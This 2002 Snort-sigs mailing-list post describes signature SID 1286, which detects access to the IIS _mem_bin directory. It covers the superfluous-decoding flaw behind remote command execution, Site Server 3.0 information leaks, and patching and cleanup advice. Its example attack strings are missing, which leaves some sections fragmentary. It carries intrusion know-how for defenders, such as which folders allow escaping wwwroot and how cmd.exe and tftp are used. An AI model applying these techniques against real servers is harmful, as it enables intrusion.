[Snort-sigs] WEB-IIS _mem_bin access SID 1286
justanlee at ...12...
Tue May 7 08:48:07 EDT 2002
# This is a template for submitting snort signature descriptions to
# the snort.org website
# Ensure that your descriptions are your own
# and not the work of others. References in the rules themselves
# should be used for linking to other's work.
# If you are unsure of some part of a rule, use that as a commentary
# and someone else perhaps will be able to fix it.
WEB-IIS _mem_bin access
This can be an attempt to gain local user privileges on a webserver, or
attempt to retrieve information not typically available for public access
such as default AUO (LDAP) schema and LDAP user password reminders.
Two areas of impact:
(comment: part 1 is probably covered under other signatures, but since it is
the most common use of _mem_bin attacks, I have included it. Really, you
never see an attack mentioned in part 2 - but it's not impossible ;)
1. Intruders can be execute commands remotely on the webserver
2. Intruders can leak information via pages installed in \wwwroot\_mem_bin
by MS Site Server 3.0
(comment: This info probably will be covered in other signatures (such as
cmd.exe or root.exe access))
1. Commands can be executed remotely on the webserver
IIS had 2 major bugs that allowed commands to be executed remotely on the
webserver. Intruders could gain local user permission by using a superfluous
decoding vulnerability in IIS. The _mem_bin directory is selected as part of
the attack, because it has a likelihood of being present (installed by MS
Site Server) and could be used to escape out of \wwwroot\. More importantly
it may have less strict permission than standard folders in \wwwroot\. Other
folders that have been used, which may also have lax permission are
/_vti_bin, /scripts and /msadc.
2. Leak information from the webserver
Systems with Site Server version 3.0 with SP3 (and prior) and NT5 SP5 are
Systems with Site Server Commerce Edition are vulnerable
For a description of this type of intrusion see:
Security considerations to keep in mind when using Site Server 3.0
RFP2201: MS Site Server Evilness
1. Execute commands remotely - can be any command, but cmd.exe is common to
test if a system is vulnerable, or already compromised
Will be translated insecurely in unpatched versions of IIS to:
2. Leak Information
Ease of Attack:
Both types of attack are quite simple.
The attempt to execute commands remotely is typically Nimda and Code Red
worms scanning routinely for vulnerable machines. The attempt to leak
information is slightly more esoteric, with the information gained possibly
only useful to a more advanced intruder.
Both relate to IIS.
For the leak information:
You are using Site Server 3.0 with better than SP3.
You are not using Active Server 3.0, and do not have the _mem_bin
directory in \wwwroot\ (on any service)
For the attempt to execute a command remotely, this False Positives apply to
unpatched IIS only.
If you are using Site Server 3.0 - patch with the latest offering from
Microsoft. Remember to re-apply SP6a on NT machines, and the IIS security
roll-up patch. If you do not use /_mem_bin/auoconfig.asp or
/_mem_bin/remind.asp, they can be removed.
If you are not using Site Server 3.0 - remove /_mem_bin from \wwwroot\ if it
Everyone using IIS should ensure they have the latest IIS Security roll-up
from Microsoft, it is also a very good idea to run the IIS lockdown tool
from Microsoft. Check your IIS log files. If they have been tampered with,
or are missing, or you see successful attempts to execute commands remotely,
such as commands to copy files, and run tftp your system has been
compromised. A system wipe followed by a fresh install is the only way to be
certain of removing any backdoors placed by the intruder. This is a very
CERT Advisory CA-2001-26 Nimda Worm
CERT Advisory CA-2001-12 Superfluous Decoding Vulnerability in IIS
Send and receive Hotmail on your mobile device: http://mobile.msn.com
More information about the Snort-sigs